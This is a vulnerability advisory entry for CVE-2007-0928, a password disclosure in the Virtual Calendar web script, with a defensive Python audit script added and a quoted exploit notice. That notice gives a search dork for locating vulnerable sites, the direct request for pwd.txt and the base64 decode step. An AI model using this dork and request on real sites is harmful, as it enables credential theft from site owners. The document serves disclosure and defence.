Virtual Calendar Web Root Sensitive Information Disclosure Vulnerability

Vulnerability ID 1191695 Vulnerability type Unknown
Published 2007-02-14 Updated 2007-02-14
CVE ID CVE-2007-0928 CNNVD-ID CNNVD-200702-280
Platform N/A CVSS score 5.0
|Vulnerability sources
https://www.securityfocus.com/bid/86609
https://cxsecurity.com/issue/WLB-2007020043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-280
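|Vulnerability details
Virtual Calendar stores sensitive information under the web root without sufficient access control. A remote attacker can download the encoded password via a direct request for pwd.txt.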
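
A defender-side check for the condition described above, as an added example that is not part of the original advisory: it walks a local document root and flags files that hold base64-reversible tokens, as pwd.txt does here. The extension list, the `user:token` line layout and the sample files are assumptions constructed for illustration.

```python
import base64
import binascii
import os
import tempfile

# Assumption: extensions worth inspecting; the advisory itself only names pwd.txt.
SUSPECT_EXT = {".txt", ".dat", ".bak", ".cfg"}

def decode_if_reversible(token):
    """Return the plaintext if token is base64 that decodes to printable ASCII."""
    if len(token) < 8 or len(token) % 4:
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, ValueError):
        return None
    return text if text.isprintable() else None

def audit_webroot(root):
    """Return (relative path, line number) for each reversible token under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() not in SUSPECT_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    # Assumed layout: bare token or "user:token" per line.
                    for token in line.replace(":", " ").split():
                        if decode_if_reversible(token) is not None:
                            findings.append((os.path.relpath(path, root), lineno))
    return findings

def build_sample_webroot():
    """Constructed sample: one encoded credential file and one harmless file."""
    root = tempfile.mkdtemp(prefix="webroot-")
    encoded = base64.b64encode(b"constructed-pass").decode("ascii")
    with open(os.path.join(root, "pwd.txt"), "w") as fh:
        fh.write("admin:" + encoded + "\n")
    with open(os.path.join(root, "readme.txt"), "w") as fh:
        fh.write("Virtual Calendar demo notes\n")
    return root

if __name__ == "__main__":
    for rel, lineno in audit_webroot(build_sample_webroot()):
        print(f"{rel}:{lineno}: reversible encoded value stored under the web root")
```

A file flagged this way belongs outside the document root, and the stored value should be a salted password hash rather than a reversible encoding.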
|Exploit
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Virtual Calendar <= (pwd.txt) Remote Password Disclosure Vulnerability

Script: Virtual Calendar

DorK: "intitle:Virtual intitle:Calendar intitle:Demo"

URL: 
http://www.scriptsez.net/download/download.php?action=download&p=vcalendar.zip&ns=1

Discovered by: BorN To K!LL

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

ExploiT:
~~~~~
www.site.com/[path]/pwd.txt

as we C .... crack the password with base64 decode ....

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

GreeTz 2 :.
Dr.2  ,  AsbMay  ,  General C  ,  ToOoFa  ,  str0ke  ,  SHiKaA  ,  
ThE-LoRd-Of-CrAcKiNg ...

AsbMay's Group  &  KuW-SeC TeaM  & Dm3R7 TeaM .....

Thanks a lot 2  www.milw0rm.com   ......

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

|Affected products
Virtual Calendar Virtual Calendar 0
|References

Source: BUGTRAQ
Name: 20070210 Virtual Calendar <= (pwd.txt) Remote Password Disclosur Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/459844/100/0/threaded
Source: OSVDB
Name: 33183
Link: http://osvdb.org/33183
Source: XF
Name: virtualcalendar-pwd-information-disclosure(32446)
Link: http://xforce.iss.net/xforce/xfdb/32446
Source: SREASON
Name: 2240
Link: http://securityreason.com/securityalert/2240
Source: SECUNIA
Name: 24125
Link: http://secunia.com/advisories/24125